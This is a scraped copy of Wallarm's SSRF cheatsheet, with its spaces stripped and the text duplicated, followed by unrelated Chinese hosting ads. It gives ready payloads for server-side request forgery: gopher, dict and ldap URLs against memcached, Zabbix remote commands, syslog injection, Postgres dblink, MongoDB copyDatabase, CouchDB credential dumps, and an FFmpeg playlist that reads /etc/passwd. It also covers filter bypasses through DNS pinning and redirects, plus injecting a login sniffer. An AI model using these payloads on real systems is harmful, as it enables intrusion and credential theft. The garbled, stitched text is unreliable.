expressionpastebin.com
pastebin.com 时间:2021-04-05 阅读:()
SSRFbible.
CheatsheetRevision1.
0326Jan2017Authors:@Wallarm@d0znppresearchteamWallarm.
com|lab.
wallarm.
comTryournewproduct.
WallarmFAST:securitytestsfromtraffichttps://wallarm.
com/wallarm-fast/wallarm.
com1TableofcontentsTableofcontentsBasicsTypicalattackstepsFileDescriptorsexploitationwayURLschemasupportProtocolsSSRFsmugglingSmugglingexamplesApacheweb-serverHTTPparserNginxweb-serverHTTPparserVulnerabilitiesBasicsExamplesGoogleDocsZeroNightshackquestchallengeExploitationtricksBypassingrestrictionsInputvalidationUnsaferedirectDNSpinningDNSpinningraceconditionPHPfsockopen()urlparsingtricksNetworkrestrictionsProtocolfingerprintingExamplesHTTPMemcachedRetrievingdataExamplesHTTPresponseencapsulationintoXMLformattedresponseConsolecURLwildcardsURLresponsesconcatenationSMBRelayexploitationOriginalrequestdatasniffingExamplesMemcachedwallarm.
com2ExploitsPHP-FPMSyslogExploitsZabbixagentdExploitsPostgresExploitsMongoDBRedisCouchDBExploitsFFmpegReferencesToolsResearcheswallarm.
com3BasicsSSRF-ServerSideRequestForgeryattacks.
Theabilitytocreaterequestsfromthevulnerableservertointra/internet.
UsingaprotocolsupportedbyavailableURIschemas,youcancommunicatewithservicesrunningonotherprotocols.
Herewecollectthevariousoptionsandexamples(exploits)ofsuchinteraction.
Seeforintroductionrelatedresearches.
Typicalattacksteps1.
Scaninternalnetworktodetermineinternalinfrastructurewhichyoumayaccess2.
Collectopenedportsatlocalhostandotherinternalhostswhichyouwant(basicallybytime-baseddetermination)3.
Determineservices/daemonsonportsusingwikiordaemonsbanners(ifyoumaywatchoutput)4.
DeterminetypeofyouSSRFcombination:Directsocketaccess(suchasthisexample)Socketsclient(suchasjavaURI,cURL,LWP,others)5.
IncaseofdirectsocketaccessdetermineCRLFandotherinjectionsforsmuggling6.
Incaseofsocketsclient,determineavailableURIschemas7.
Compareavailableschemasandservices/daemonsprotocolstofindsmugglingpossibilities8.
Determinehost-basedauthdaemonsandtrytoexploititFileDescriptorsexploitationwayUsefulinclouds,sharedhostingsandotherslargeinfrastructures.
Firstreadslides20-21aboutFDsand22-23aboutProcFSfromthispaper.
TherearethreewaystoaccesstoFDs:InterpretersAPI(suchasfd://wrapperforPHP)IftherearenosuchAPIorrequiredfunctionsdisabled,youcantrytoloadnativeextension:PHP(requiredlopen,butnotexec):https://github.
com/dhotson/fdopen-phpexec()callfromAPI(suchasexec('echo123>&');)youmayaccessonlyFDswithoutO_CLOEXECflag.
CprogramtoscanavailableFDsishere:https://github.
com/ONsec-Lab/scripts/blob/master/list-open-fd.
c.
ProcFSfiles(/proc//fd/)*Note,thatyoucannotaccesstosocketsthrough/proc//fd/files!
wallarm.
com4URLschemasupportPHPJavacURLLWPASP.
NET1gopherenableby--with-curlwrappersbeforelastpatchesw/o\0char+ASP.
NETloadXML($resp);//echo$resp.
"nn";echo$doc->getElementsByTagName("error")->item(0)->nodeValue;if(libxml_get_errors()!
=null){print_r(libxml_get_errors());}>wallarm.
com9ExploitationtricksBypassingrestrictionsBasicallyrestrictionswhichyoumayfindinSSRFexploitationcanbesplitintotwogroups:Inputvalidation(suchasregularexpressionURLfilter)Networkrestrictions(firewallsrules)InputvalidationUnsaferedirectEasywaytobypassinputvalidationisURLredirection.
HTTPclientsnotabrowsers.
Therearenormallytodounsaferedirect(exceptofJavacase).
WorksfineforcURL,LWP,ASP.
NET(exploit:http://anyhostwithredirest.
com/->gopher://localhost:11211/1stats%0aquit).
DNSpinningTobypassdomainvalidationyoumaysimpleusepinningtechnique.
Forexample,defineAorAAAArecordsonyourDNSservertoyoursubdomainsintovictim'sintranet:$nslookuplocal.
oxod.
ruNon-authoritativeanswer:Name:local.
oxod.
ruAddress:127.
0.
0.
18.
8.
8.
8(somethingwhitelistedinvalidate_domainfunction)Andthesecondresponsecouldlookslike:evil.
com->127.
0.
0.
1PHPfsockopen()urlparsingtricks3.
php]]>//validfooterforreadableformatwallarm.
com14SMBRelayexploitationThistechniquedescribedinrelatedresearch"SSRF+Java+Windows=Love".
IncaseofJava-basedapplicationonOSWindowstarget,attackercanexecuteanNTLMrelayattackoverHTTP.
It'spossiblebecauseJavahasaninternalHTTP-client,whichsupportsNTLMauthenticationbydefault.
OriginalrequestdatasniffingInmanycasesthereareusefultosniffdataofinitialrequestusingSSRF.
ItsmaybeOAuthtokens,basicauthcredential,POSTbodiesandothers.
Thisproblemcanbesolvedifyouhavetheabilitytomodifytheserver'sresponse.
Youmustbeinfluencetheresponsefromaoneserver,onreceiptofarequestfromanotherserver.
Itwilllooklikeopen-redirect(WASC-38)orresponsesplitting/smuggling(WASC-25,WASC-27),butthereareserver'shttplibrarysuchascURLinsteadoftheuser'sbrowser.
307HTTPstatus(TemporaryRedirectExplained)andotherscanbeusedtoretrieveoriginalPOSTbody.
TableofPOSTredirection:Lib/Status300301302303304305306307308cURLOKOKOKOK-LWPPHPwallarm.
com15Example:$url="http://localhost/tests/redir.
phps={$_GET['s']}&r=http://localhost:8000/";$ch=curl_init($url);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,"key=secret");$resp=curl_exec($ch);Youcansteal"key=secret"databyusingopenredirectvulnerabilitywithresponsestatuses300,305,306,307orbyhttpresponsesplitting/httpheaderinjectionvulnerabilities.
AndtherearenowaystostealsecretinLWPcase:usestrict;usewarnings;my$b=LWP::UserAgent->new;my$u='http://localhost/tests/redir.
phps=307&r=http://localhost:8000/a';$b->post($u,{'key'=>'secret'});wallarm.
com16ExamplesSSRFalsoopenagatetovariousNoSQLattackssuchasServer-SideJavaScriptinjections.
MemcachedProtocoldocumentation:https://github.
com/memcached/memcached/blob/master/doc/protocol.
txtExploitationsteps:1.
collectallkeys2.
determineinterestingkeys3.
replacekey'svaluestoarbitraryExploitationstechniques:FindHTMLtemplatesandinjectJSloginsniffertocollectlogin/passwordsFinddynamictemplates(macros,PHP,others)andinjectarbitrarycode(RCE)FindyoursessionandescalateyourprivilegesCreatenewsessionwithlongexpirationandsetadminprivilegesExploitsgopher://localhost:11211/1%0astats%0aquitdict://locahost:11211/statsldap://localhost:11211/%0astats%0aquitPHP-FPMExploitlocalinstallationtobypassrestrictionssuchassafe_modeandothershttp://pastebin.
com/XP2BYmR7.
Payyourattention,it'sreallyusefullattackvector!
wallarm.
com17SyslogTypicallyUDPbutreallycommonlistenonTCPport514.
Youmayaddstringstosyslogeasily.
Exploithttp://string-that-you-want-to-add.
evil.
com:514/FirstconfigureDNStoresolvestring-that-you-want-to-add.
evil.
comas127.
0.
0.
1HTTPrequest:GET/aHTTP/1.
1Host:string-that-you-want-to-add.
evil.
com:8000Connection:Keep-AliveSyslogentities:Nov2300:53:50localhostHost:string-that-you-want-to-add.
evil.
com:8000#015Nov2300:53:50localhostConnection:Keep-Alive#015Nov2300:53:50localhost#015It'susefulthingtoexploitalotofmonitoringsystemsbyaclient-sideissueslikeXSS.
Justbecausethedatafromsysloglookslikeaverifieddataforit.
CRLFinjectionmakesyslogentitiesmoreclear(seebelow).
Exploitsdict://localhost:514/ALARM!
!
!
ldap://localhost:514/\r\nALARM!
!
!
(LWPonly)Syslogentities:Nov2300:53:50localhostALARM!
!
!
#015ZabbixagentdZabbixisverycommonmonitoringsystem.
Monitoredserversrunningzabbix_agentdbinarywhichconfiguredby/etc/zabbix/zabbix_agentd.
conffile.
Defaultlistenedportis10050.
Zabbixagentdhaveonlyhost-basedauthorization,describedinconfigfile:Server=127.
0.
0.
1,monitor.
trusted.
network.
netTherearetypicallytoinclude127.
0.
0.
1intoauthorizedserversbydebuggingreasonsandbydefault.
Agentdprotocolisplain/textandsimple:"\n"usingaslineterminatorandpacketformatis"item[key]".
Allavailableitemslistedbelow:http://www.
zabbix.
com/documentation/1.
8/manual/config/items.
Zabbixagentdclosesocketafterfirstmalformedline(requestunexistingkeyforexample).
Soyoucan'tusesmugglingiffirstlineofrequestisnotcontrolledbyyou.
wallarm.
com18Sometimesagentdconfiguredtorunarbitrarycommandsfromservers(itemsystem.
ruusedtoruncommandsfromkeyargument):EnableRemoteCommands=1Exploitsgopher://localhost:10050/1vfs.
file.
regexp[/etc/hosts,7]Serverresponse:ZBXD127.
0.
0.
1localhostads.
localhostlocalhost.
vvasd.
localhost.
vvgopher://localhost:10050/1system.
run[ls]Serverresponse:ZBXD,usretcvarbootPostgresAnyfunctionswhichcanopensocketsandwriteuser'sdataintoitcanbeexploitedforSSRF.
Suchasfunctionstoexternaldatabaseconnectionswhichprovidedbyallmoderndatabases(DB2/Oracle/Postgres/etc).
AttackermayusethisfunctionsthroughSQLinjectiontoexploitanythinginintranet.
DBLINKdesciption:http://www.
postgresql.
org/docs/8.
4/static/dblink.
html.
Syntaxofconnectionstringavailablehere:http://www.
postgresql.
org/docs/8.
4/static/libpq-connect.
htmlExploitsSELECTdblink_send_query('host=127.
0.
0.
1dbname=quituser=\'\nstats\n\'password=1port=11211sslmode=disable','selectversion();');wallarm.
com19MongoDBAttackermayusedifferentinternalfunctions,suchascopyDatabase()andotherstoopenarbitrarysocketandputsarbitrarydataintoit.
ExploitsWritebinarydataintosocket:>db.
copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')$nc-l8000|hexdump-C000000003b0000002800000000000000d40700000000001000000000010203040506072e73797374syst|00000020656d2e6e616d65737061636573000000|em.
namespaces.
.
.
|Communicatewithmemcached:>db.
copyDatabase("\nstats\nquit",'test','localhost:11211')RedisThereisamanycommandsinRediswhichcanhelpswithanSSRFwork:SLAVEOFhostportMIGRATEhostportkey…(MIGRATE192.
168.
1.
346379""05000KEYSkey1key2key3)CONFIGSET.
.
.
wallarm.
com20CouchDBCouchDBisreallycooltargetforSSRFattacks.
ThereareHTTPRESTAPIwhichprovideattackertoexploititusingonlyvalidHTTPrequestswithoutanysmuggling.
APIdetails:http://wiki.
apache.
org/couchdb/Complete_HTTP_API_Reference.
POST/PUT/DELETErequestsmaybeforgedalsobysmugglingtechniquestoexecuteserver-sideJScodeforexample.
Exploitshttp://localhost:5984/_users/_all_docstosteal_usersdatabasewithcredentials:HTTP/1.
1200OKServer:CouchDB/1.
2.
0(ErlangOTP/R15B01)ETag:"BD1WV12007V05JTG4X6YHIHCA"Date:Tue,18Dec201221:39:59GMTContent-Type:text/plain;charset=utf-8Cache-Control:must-revalidate{"total_rows":1,"offset":0,"rows":[{"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}}]}Thisexampletestedondebianstableinstallationfrompackagewithoutanyadditionalconfiguration.
Toexecuteserver-sideJSwithrestrictions(server-sideJSissandboxed,nonetwork,IOnoraccessoutsidetheprovideddocumentandfunctions)youmayuseViewAPI.
ThistechniquewasdescribedatBHUS11inthispaperforweb-applicationbasedinjection.
Readthisfirst:http://wiki.
apache.
org/couchdb/HTTP_view_APIAttackercouldalsosendrequestsfromCouchDBservertointranetbyusingreplicationfunction(http://docs.
couchdb.
org/en/stable/api/server/common.
html#replicate).
POSThttp://couchdb:5984/_replicateContent-Type:application/jsonAccept:application/json{"source":"recipes","target":"http://ssrf-me:11211/recipes",}wallarm.
com21FFmpegM38ufileformatprovidessomeusefulmacroscalled"EXTINF".
ThismacrosallowsattackertoreadarbitraryfilesanddoSSRFattacks.
Let'slookatsomebeautifulexampleslistedbelow:$catvideo.
mp4#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.
0,concat:http://example.
org/header.
y4m|file:///etc/passwd#EXT-X-ENDLIST$ffmpeg-ivideo.
mp4thumbnail.
png$ffmpeg-ithumbnail.
pngout.
y4m$catout.
y4mYUV4MPEG2W30H30F25:1IpA0:0CmonoFRAME#$FreeBSD:release/10.
0.
0/etc/master.
passwd256366,!
2013-10-1206:08:18Zrpaulo$#root:*:0:0:Charlie&:/root:/usr/local/bin/zshtoor:*:0:0:Bourne-againSuperuser:/root:Originallink:https://bugs.
launchpad.
net/ubuntu/+source/ffmpeg/+bug/1533367wallarm.
com22References1.
http://en.
wikipedia.
org/wiki/URI_scheme2.
http://en.
wikipedia.
org/wiki/List_of_TCP_and_UDP_port_numbers3.
http://msdn.
microsoft.
com/en-us/library/system.
uri.
scheme.
aspx4.
http://search.
cpan.
org/~gaas/libwww-perl-6.
04/lib/LWP.
pm5.
http://php.
net/manual/en/wrappers.
php6.
http://docs.
oracle.
com/javase/1.
5.
0/docs/api/javax/print/attribute/standard/ReferenceUriSchemesSupported.
html7.
http://www.
kernel.
org/doc/man-pages/online/pages/man2/open.
2.
html8.
http://media.
blackhat.
com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.
pdf9.
http://www.
nostarch.
com/download/tangledweb_ch3.
pdfTools1.
https://github.
com/ONsec-Lab/scripts/blob/master/list-open-fd.
cResearches21.
http://www.
shmoocon.
org/2008/presentations/Web%20portals,%20gateway%20to%20information.
ppt2.
http://www.
slideshare.
net/d0znpp/xxe-advanced-exploitation3.
http://www.
slideshare.
net/d0znpp/caro2012-attack-largemodernwebapplications4.
http://media.
blackhat.
com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.
pdf5.
http://erpscan.
com/wp-content/uploads/2012/11/SSRF.
2.
0.
poc_.
pdf6.
http://www.
riyazwalikar.
com/2012/11/cross-site-port-attacks-xspa-part-2.
html7.
http://www.
slideshare.
net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities8.
http://erpscan.
com/press-center/smbrelay-bible-7-ssrf-java-windows-love/9.
https://bugs.
launchpad.
net/ubuntu/+source/ffmpeg/+bug/15333672Sortedbydatewallarm.
com23
CheatsheetRevision1.
0326Jan2017Authors:@Wallarm@d0znppresearchteamWallarm.
com|lab.
wallarm.
comTryournewproduct.
WallarmFAST:securitytestsfromtraffichttps://wallarm.
com/wallarm-fast/wallarm.
com1TableofcontentsTableofcontentsBasicsTypicalattackstepsFileDescriptorsexploitationwayURLschemasupportProtocolsSSRFsmugglingSmugglingexamplesApacheweb-serverHTTPparserNginxweb-serverHTTPparserVulnerabilitiesBasicsExamplesGoogleDocsZeroNightshackquestchallengeExploitationtricksBypassingrestrictionsInputvalidationUnsaferedirectDNSpinningDNSpinningraceconditionPHPfsockopen()urlparsingtricksNetworkrestrictionsProtocolfingerprintingExamplesHTTPMemcachedRetrievingdataExamplesHTTPresponseencapsulationintoXMLformattedresponseConsolecURLwildcardsURLresponsesconcatenationSMBRelayexploitationOriginalrequestdatasniffingExamplesMemcachedwallarm.
com2ExploitsPHP-FPMSyslogExploitsZabbixagentdExploitsPostgresExploitsMongoDBRedisCouchDBExploitsFFmpegReferencesToolsResearcheswallarm.
com3BasicsSSRF-ServerSideRequestForgeryattacks.
Theabilitytocreaterequestsfromthevulnerableservertointra/internet.
UsingaprotocolsupportedbyavailableURIschemas,youcancommunicatewithservicesrunningonotherprotocols.
Herewecollectthevariousoptionsandexamples(exploits)ofsuchinteraction.
Seeforintroductionrelatedresearches.
Typicalattacksteps1.
Scaninternalnetworktodetermineinternalinfrastructurewhichyoumayaccess2.
Collectopenedportsatlocalhostandotherinternalhostswhichyouwant(basicallybytime-baseddetermination)3.
Determineservices/daemonsonportsusingwikiordaemonsbanners(ifyoumaywatchoutput)4.
DeterminetypeofyouSSRFcombination:Directsocketaccess(suchasthisexample)Socketsclient(suchasjavaURI,cURL,LWP,others)5.
IncaseofdirectsocketaccessdetermineCRLFandotherinjectionsforsmuggling6.
Incaseofsocketsclient,determineavailableURIschemas7.
Compareavailableschemasandservices/daemonsprotocolstofindsmugglingpossibilities8.
Determinehost-basedauthdaemonsandtrytoexploititFileDescriptorsexploitationwayUsefulinclouds,sharedhostingsandotherslargeinfrastructures.
Firstreadslides20-21aboutFDsand22-23aboutProcFSfromthispaper.
TherearethreewaystoaccesstoFDs:InterpretersAPI(suchasfd://wrapperforPHP)IftherearenosuchAPIorrequiredfunctionsdisabled,youcantrytoloadnativeextension:PHP(requiredlopen,butnotexec):https://github.
com/dhotson/fdopen-phpexec()callfromAPI(suchasexec('echo123>&');)youmayaccessonlyFDswithoutO_CLOEXECflag.
CprogramtoscanavailableFDsishere:https://github.
com/ONsec-Lab/scripts/blob/master/list-open-fd.
c.
ProcFSfiles(/proc//fd/)*Note,thatyoucannotaccesstosocketsthrough/proc//fd/files!
wallarm.
com4URLschemasupportPHPJavacURLLWPASP.
NET1gopherenableby--with-curlwrappersbeforelastpatchesw/o\0char+ASP.
NETloadXML($resp);//echo$resp.
"nn";echo$doc->getElementsByTagName("error")->item(0)->nodeValue;if(libxml_get_errors()!
=null){print_r(libxml_get_errors());}>wallarm.
com9ExploitationtricksBypassingrestrictionsBasicallyrestrictionswhichyoumayfindinSSRFexploitationcanbesplitintotwogroups:Inputvalidation(suchasregularexpressionURLfilter)Networkrestrictions(firewallsrules)InputvalidationUnsaferedirectEasywaytobypassinputvalidationisURLredirection.
HTTPclientsnotabrowsers.
Therearenormallytodounsaferedirect(exceptofJavacase).
WorksfineforcURL,LWP,ASP.
NET(exploit:http://anyhostwithredirest.
com/->gopher://localhost:11211/1stats%0aquit).
DNSpinningTobypassdomainvalidationyoumaysimpleusepinningtechnique.
Forexample,defineAorAAAArecordsonyourDNSservertoyoursubdomainsintovictim'sintranet:$nslookuplocal.
oxod.
ruNon-authoritativeanswer:Name:local.
oxod.
ruAddress:127.
0.
0.
18.
8.
8.
8(somethingwhitelistedinvalidate_domainfunction)Andthesecondresponsecouldlookslike:evil.
com->127.
0.
0.
1PHPfsockopen()urlparsingtricks3.
php]]>//validfooterforreadableformatwallarm.
com14SMBRelayexploitationThistechniquedescribedinrelatedresearch"SSRF+Java+Windows=Love".
IncaseofJava-basedapplicationonOSWindowstarget,attackercanexecuteanNTLMrelayattackoverHTTP.
It'spossiblebecauseJavahasaninternalHTTP-client,whichsupportsNTLMauthenticationbydefault.
OriginalrequestdatasniffingInmanycasesthereareusefultosniffdataofinitialrequestusingSSRF.
ItsmaybeOAuthtokens,basicauthcredential,POSTbodiesandothers.
Thisproblemcanbesolvedifyouhavetheabilitytomodifytheserver'sresponse.
Youmustbeinfluencetheresponsefromaoneserver,onreceiptofarequestfromanotherserver.
Itwilllooklikeopen-redirect(WASC-38)orresponsesplitting/smuggling(WASC-25,WASC-27),butthereareserver'shttplibrarysuchascURLinsteadoftheuser'sbrowser.
307HTTPstatus(TemporaryRedirectExplained)andotherscanbeusedtoretrieveoriginalPOSTbody.
TableofPOSTredirection:Lib/Status300301302303304305306307308cURLOKOKOKOK-LWPPHPwallarm.
com15Example:$url="http://localhost/tests/redir.
phps={$_GET['s']}&r=http://localhost:8000/";$ch=curl_init($url);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,"key=secret");$resp=curl_exec($ch);Youcansteal"key=secret"databyusingopenredirectvulnerabilitywithresponsestatuses300,305,306,307orbyhttpresponsesplitting/httpheaderinjectionvulnerabilities.
AndtherearenowaystostealsecretinLWPcase:usestrict;usewarnings;my$b=LWP::UserAgent->new;my$u='http://localhost/tests/redir.
phps=307&r=http://localhost:8000/a';$b->post($u,{'key'=>'secret'});wallarm.
com16ExamplesSSRFalsoopenagatetovariousNoSQLattackssuchasServer-SideJavaScriptinjections.
MemcachedProtocoldocumentation:https://github.
com/memcached/memcached/blob/master/doc/protocol.
txtExploitationsteps:1.
collectallkeys2.
determineinterestingkeys3.
replacekey'svaluestoarbitraryExploitationstechniques:FindHTMLtemplatesandinjectJSloginsniffertocollectlogin/passwordsFinddynamictemplates(macros,PHP,others)andinjectarbitrarycode(RCE)FindyoursessionandescalateyourprivilegesCreatenewsessionwithlongexpirationandsetadminprivilegesExploitsgopher://localhost:11211/1%0astats%0aquitdict://locahost:11211/statsldap://localhost:11211/%0astats%0aquitPHP-FPMExploitlocalinstallationtobypassrestrictionssuchassafe_modeandothershttp://pastebin.
com/XP2BYmR7.
Payyourattention,it'sreallyusefullattackvector!
wallarm.
com17SyslogTypicallyUDPbutreallycommonlistenonTCPport514.
Youmayaddstringstosyslogeasily.
Exploithttp://string-that-you-want-to-add.
evil.
com:514/FirstconfigureDNStoresolvestring-that-you-want-to-add.
evil.
comas127.
0.
0.
1HTTPrequest:GET/aHTTP/1.
1Host:string-that-you-want-to-add.
evil.
com:8000Connection:Keep-AliveSyslogentities:Nov2300:53:50localhostHost:string-that-you-want-to-add.
evil.
com:8000#015Nov2300:53:50localhostConnection:Keep-Alive#015Nov2300:53:50localhost#015It'susefulthingtoexploitalotofmonitoringsystemsbyaclient-sideissueslikeXSS.
Justbecausethedatafromsysloglookslikeaverifieddataforit.
CRLFinjectionmakesyslogentitiesmoreclear(seebelow).
Exploitsdict://localhost:514/ALARM!
!
!
ldap://localhost:514/\r\nALARM!
!
!
(LWPonly)Syslogentities:Nov2300:53:50localhostALARM!
!
!
#015ZabbixagentdZabbixisverycommonmonitoringsystem.
Monitoredserversrunningzabbix_agentdbinarywhichconfiguredby/etc/zabbix/zabbix_agentd.
conffile.
Defaultlistenedportis10050.
Zabbixagentdhaveonlyhost-basedauthorization,describedinconfigfile:Server=127.
0.
0.
1,monitor.
trusted.
network.
netTherearetypicallytoinclude127.
0.
0.
1intoauthorizedserversbydebuggingreasonsandbydefault.
Agentdprotocolisplain/textandsimple:"\n"usingaslineterminatorandpacketformatis"item[key]".
Allavailableitemslistedbelow:http://www.
zabbix.
com/documentation/1.
8/manual/config/items.
Zabbixagentdclosesocketafterfirstmalformedline(requestunexistingkeyforexample).
Soyoucan'tusesmugglingiffirstlineofrequestisnotcontrolledbyyou.
wallarm.
com18Sometimesagentdconfiguredtorunarbitrarycommandsfromservers(itemsystem.
ruusedtoruncommandsfromkeyargument):EnableRemoteCommands=1Exploitsgopher://localhost:10050/1vfs.
file.
regexp[/etc/hosts,7]Serverresponse:ZBXD127.
0.
0.
1localhostads.
localhostlocalhost.
vvasd.
localhost.
vvgopher://localhost:10050/1system.
run[ls]Serverresponse:ZBXD,usretcvarbootPostgresAnyfunctionswhichcanopensocketsandwriteuser'sdataintoitcanbeexploitedforSSRF.
Suchasfunctionstoexternaldatabaseconnectionswhichprovidedbyallmoderndatabases(DB2/Oracle/Postgres/etc).
AttackermayusethisfunctionsthroughSQLinjectiontoexploitanythinginintranet.
DBLINKdesciption:http://www.
postgresql.
org/docs/8.
4/static/dblink.
html.
Syntaxofconnectionstringavailablehere:http://www.
postgresql.
org/docs/8.
4/static/libpq-connect.
htmlExploitsSELECTdblink_send_query('host=127.
0.
0.
1dbname=quituser=\'\nstats\n\'password=1port=11211sslmode=disable','selectversion();');wallarm.
com19MongoDBAttackermayusedifferentinternalfunctions,suchascopyDatabase()andotherstoopenarbitrarysocketandputsarbitrarydataintoit.
ExploitsWritebinarydataintosocket:>db.
copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')$nc-l8000|hexdump-C000000003b0000002800000000000000d40700000000001000000000010203040506072e73797374syst|00000020656d2e6e616d65737061636573000000|em.
namespaces.
.
.
|Communicatewithmemcached:>db.
copyDatabase("\nstats\nquit",'test','localhost:11211')RedisThereisamanycommandsinRediswhichcanhelpswithanSSRFwork:SLAVEOFhostportMIGRATEhostportkey…(MIGRATE192.
168.
1.
346379""05000KEYSkey1key2key3)CONFIGSET.
.
.
wallarm.
com20CouchDBCouchDBisreallycooltargetforSSRFattacks.
ThereareHTTPRESTAPIwhichprovideattackertoexploititusingonlyvalidHTTPrequestswithoutanysmuggling.
APIdetails:http://wiki.
apache.
org/couchdb/Complete_HTTP_API_Reference.
POST/PUT/DELETErequestsmaybeforgedalsobysmugglingtechniquestoexecuteserver-sideJScodeforexample.
Exploitshttp://localhost:5984/_users/_all_docstosteal_usersdatabasewithcredentials:HTTP/1.
1200OKServer:CouchDB/1.
2.
0(ErlangOTP/R15B01)ETag:"BD1WV12007V05JTG4X6YHIHCA"Date:Tue,18Dec201221:39:59GMTContent-Type:text/plain;charset=utf-8Cache-Control:must-revalidate{"total_rows":1,"offset":0,"rows":[{"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}}]}Thisexampletestedondebianstableinstallationfrompackagewithoutanyadditionalconfiguration.
Toexecuteserver-sideJSwithrestrictions(server-sideJSissandboxed,nonetwork,IOnoraccessoutsidetheprovideddocumentandfunctions)youmayuseViewAPI.
ThistechniquewasdescribedatBHUS11inthispaperforweb-applicationbasedinjection.
Readthisfirst:http://wiki.
apache.
org/couchdb/HTTP_view_APIAttackercouldalsosendrequestsfromCouchDBservertointranetbyusingreplicationfunction(http://docs.
couchdb.
org/en/stable/api/server/common.
html#replicate).
POSThttp://couchdb:5984/_replicateContent-Type:application/jsonAccept:application/json{"source":"recipes","target":"http://ssrf-me:11211/recipes",}wallarm.
com21FFmpegM38ufileformatprovidessomeusefulmacroscalled"EXTINF".
ThismacrosallowsattackertoreadarbitraryfilesanddoSSRFattacks.
Let'slookatsomebeautifulexampleslistedbelow:$catvideo.
mp4#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.
0,concat:http://example.
org/header.
y4m|file:///etc/passwd#EXT-X-ENDLIST$ffmpeg-ivideo.
mp4thumbnail.
png$ffmpeg-ithumbnail.
pngout.
y4m$catout.
y4mYUV4MPEG2W30H30F25:1IpA0:0CmonoFRAME#$FreeBSD:release/10.
0.
0/etc/master.
passwd256366,!
2013-10-1206:08:18Zrpaulo$#root:*:0:0:Charlie&:/root:/usr/local/bin/zshtoor:*:0:0:Bourne-againSuperuser:/root:Originallink:https://bugs.
launchpad.
net/ubuntu/+source/ffmpeg/+bug/1533367wallarm.
com22References1.
http://en.
wikipedia.
org/wiki/URI_scheme2.
http://en.
wikipedia.
org/wiki/List_of_TCP_and_UDP_port_numbers3.
http://msdn.
microsoft.
com/en-us/library/system.
uri.
scheme.
aspx4.
http://search.
cpan.
org/~gaas/libwww-perl-6.
04/lib/LWP.
pm5.
http://php.
net/manual/en/wrappers.
php6.
http://docs.
oracle.
com/javase/1.
5.
0/docs/api/javax/print/attribute/standard/ReferenceUriSchemesSupported.
html7.
http://www.
kernel.
org/doc/man-pages/online/pages/man2/open.
2.
html8.
http://media.
blackhat.
com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.
pdf9.
http://www.
nostarch.
com/download/tangledweb_ch3.
pdfTools1.
https://github.
com/ONsec-Lab/scripts/blob/master/list-open-fd.
cResearches21.
http://www.
shmoocon.
org/2008/presentations/Web%20portals,%20gateway%20to%20information.
ppt2.
http://www.
slideshare.
net/d0znpp/xxe-advanced-exploitation3.
http://www.
slideshare.
net/d0znpp/caro2012-attack-largemodernwebapplications4.
http://media.
blackhat.
com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.
pdf5.
http://erpscan.
com/wp-content/uploads/2012/11/SSRF.
2.
0.
poc_.
pdf6.
http://www.
riyazwalikar.
com/2012/11/cross-site-port-attacks-xspa-part-2.
html7.
http://www.
slideshare.
net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities8.
http://erpscan.
com/press-center/smbrelay-bible-7-ssrf-java-windows-love/9.
https://bugs.
launchpad.
net/ubuntu/+source/ffmpeg/+bug/15333672Sortedbydatewallarm.
com23
- expressionpastebin.com相关文档
- equalpastebin.com
- 0.01pastebin.com
- 特首pastebin.com
- SSRFbible.Cheatsheet
- Trojan[DDOS]/Linux.
- suitablepastebin.com
易探云:香港物理机服务器仅550元/月起;E3-1230/16G DDR3/SATA 1TB/香港BGP/20Mbps
易探云怎么样?易探云(yitanyun.com)是一家知名云计算品牌,2017年成立,从业4年之久,目前主要从事出售香港VPS、香港独立服务器、香港站群服务器等,在售VPS线路有三网CN2、CN2 GIA,该公司旗下产品均采用KVM虚拟化架构。目前,易探云推出免备案香港物理机服务器性价比很高,E3-1230 8 核*1/16G DDR3/SATA 1TB/香港BGP线路/20Mbps/不限流量,仅...
轻云互联,香港云服务器折后22元/月 美国云服务器 1核 512M内存 15M带宽 折后19.36元/月
轻云互联成立于2018年的国人商家,广州轻云互联网络科技有限公司旗下品牌,主要从事VPS、虚拟主机等云计算产品业务,适合建站、新手上车的值得选择,香港三网直连(电信CN2GIA联通移动CN2直连);美国圣何塞(回程三网CN2GIA)线路,所有产品均采用KVM虚拟技术架构,高效售后保障,稳定多年,高性能可用,网络优质,为您的业务保驾护航。官方网站:点击进入广州轻云网络科技有限公司活动规则:1.用户购...
极光KVM(限时16元),洛杉矶三网CN2,cera机房,香港cn2
极光KVM创立于2018年,主要经营美国洛杉矶CN2机房、CeRaNetworks机房、中国香港CeraNetworks机房、香港CMI机房等产品。其中,洛杉矶提供CN2 GIA、CN2 GT以及常规BGP直连线路接入。从名字也可以看到,VPS产品全部是基于KVM架构的。极光KVM也有明确的更换IP政策,下单时选择“IP保险计划”多支付10块钱,可以在服务周期内免费更换一次IP,当然也可以不选择,...
pastebin.com为你推荐
-
地图应用哪个手机定位软件最好用?蓝色骨头手机都是人类的骨头灰歌名是什么关键字关键字和一般标识符的区别同一服务器网站一个服务器能运行多少个网站sss17.com为什么GAO17.COM网站打不开了javmoo.com0904-javbo.net_avop210hhb主人公叫什么,好喜欢,有知道的吗m.kan84.net经常使用http://www.feikan.cc看电影的进来帮我下啊抓站工具仿站必备软件有哪些工具?最好好用的仿站工具是那个几个?javbibi日文里的bibi是什么意思汴京清谈汴京还被称为什么?